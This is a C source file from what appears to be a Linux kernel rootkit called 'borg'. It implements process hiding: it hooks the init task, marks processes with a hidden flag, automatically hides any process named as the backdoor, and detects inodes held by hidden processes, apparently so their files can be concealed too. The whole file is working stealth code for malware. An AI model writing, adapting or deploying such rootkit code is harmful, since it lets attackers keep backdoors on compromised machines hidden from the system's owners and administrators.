/**
 * @file process.c
 * @brief Hide processes
 */

#include <linux/sched.h>
#include <linux/smp_lock.h>
#include <linux/types.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/fdtable.h>
#include "borg.h"
#include "process.h"

struct task_struct *init_hook;

void set_init_hook(void)
{
    struct task_struct *p = current;
    
    lock_kernel();
    
    while(p->pid != 1)
	p = next_task(p);
	
    unlock_kernel();
    init_hook = p;
    _DEBUG(("%s: init hooked on %p\n", BORG_VERSION, init_hook));
}

int process_is_hidden(pid_t pid)
{
    struct task_struct *p;

    /* Is this pid valid? */    
    if(pid <= 1)
	return 0;

    /* Does the process exist? */
    if((p = process_find(pid)) == NULL)
	return 0;

    _DEBUG(("%s: process_is_hidden(%s)\n", BORG_VERSION, p->comm));
    
    /* If this process is BORG_HIDDEN_BACKDOOR, hide it. */
    if(strcmp(p->comm, BORG_HIDDEN_BACKDOOR) == 0)
	process_hide(pid);
    
    /* See if BORG_HIDDEN_PROCESS is set. */
    return (p->flags & BORG_HIDDEN_PROCESS);
}

int process_hidden_has_inode(unsigned long ino)
{
    struct task_struct *p;
    struct file **files;
    int i;
    
    for_each_task(p)
    {
	if(p->files->fdt->fd)
	{
	    files = p->files->fdt->fd;
	    for(i = 0; files[i]; i++)
	    {
		if(files[i]->f_dentry->d_inode->i_ino == ino)
		{
		    if(p->flags & BORG_HIDDEN_PROCESS)
		    {
			_DEBUG(("%s: process_hidden_has_inode(%lu): belongs to HIDDEN pid [%d]\n",
			    BORG_VERSION, ino, p->pid));
			return 1;
		    } else
			return 0;
		}
	    }
	}
    }
    return 0;
}

void process_hide(pid_t pid)
{
    struct task_struct *p;
    
    if((p = process_find(pid)) == NULL)
	return;
    p->flags |= BORG_HIDDEN_PROCESS;
}

void process_unhide(pid_t pid)
{
    struct task_struct *p;
    
    if((p = process_find(pid)) == NULL)
	return;
    p->flags &= ~BORG_HIDDEN_PROCESS;
}

struct task_struct * process_find(pid_t pid)
{
    struct task_struct *p;
    
    for_each_task(p)
    {
	if(p->pid == pid)
	    return p;
    }
    return NULL;
}
